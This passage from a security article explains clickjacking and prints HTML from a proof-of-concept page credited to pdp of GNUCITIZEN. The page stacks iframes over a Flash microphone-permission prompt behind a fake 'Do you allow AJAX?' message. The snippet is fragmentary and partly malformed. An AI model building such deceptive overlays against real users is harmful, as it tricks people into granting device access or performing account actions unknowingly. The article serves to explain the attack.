Home > Articles > Security > General Security and Privacy

  • Print
  • + Share This
Like this article? We recommend

How Clickjacking Works

Clickjacking is perhaps one of the easiest techniques in the arsenal of skilled attackers. Its alternative name, UI redress attack (suggested by researcher Michal Zalewski), says it all. The attacker simply redresses the user interface to fit the attack purpose. Going back to our previous example, let's see how the malicious page would have looked without its disguise (see Figure 2).

Obviously, now the page doesn't look too friendly. By clicking Allow, you've exposed your privacy and security to a serious attack.

The following snippet shows the malicious page's HTML:

body {
background: #eeeeee;
<iframe style="position:absolute;top:10px;left:10px;width:400px;" src="mic.swf" frameborder="0"></iframe>
<iframe style="position:absolute;top:10px;left:10px;width:400px;height:115px" src="" frameborder="0"></iframe>
<iframe style="position:absolute;top:115px;left:10px;width:140px;height:115px" src="" frameborder="0"></iframe>
<iframe style="position:absolute;top:115px;left:230px;width:180px;height:115px" src="" frameborder="0"></iframe>
<iframe style="position:absolute;top:150px;left:10px;width:400px;height:100px" src="" frameborder="0"></iframe>
<div style="position:absolute;top:60px;left:150px;">
  <h1 style="margin:0">Do you allow AJAX?</h1>
  <p style="margin:0">AJAX will improve your user experience!</p>
<pi style="color:#cccccc"><em>All your mics are belong to us!</em></p>

<!-- codded by pdp|gnucitizen -->

It's not even very complicated! In the example above, the attacker use Flash to compromise the victim, but clickjacking attacks apply to most technologies, web pages, and applications that you use on a daily basis. For example, clickjacking attacks can be used to force you to perform actions on your Facebook account without your even realizing it. You could be tricked into deleting your Google account—or, even worse, exposing all of your private messages to the whole world.

In general, the clickjacking technique is known as the anti-CSRF killer. CSRF stands for cross-site request forgeries, a simple attack based on another design bug, which often has a devastating effect when performed correctly. CSRF attacks can be used to force the user to perform HTTP requests on behalf of the attacker without any indication that anything is happening. Fortunately for us, CSRF attacks can be mitigated to an extent by forcing session-management facilities to use unique tokens to identify each request. However, clickjacking simply destroys these mitigations and forces us to add yet another layer of security.

  • + Share This
  • 🔖 Save To Your Account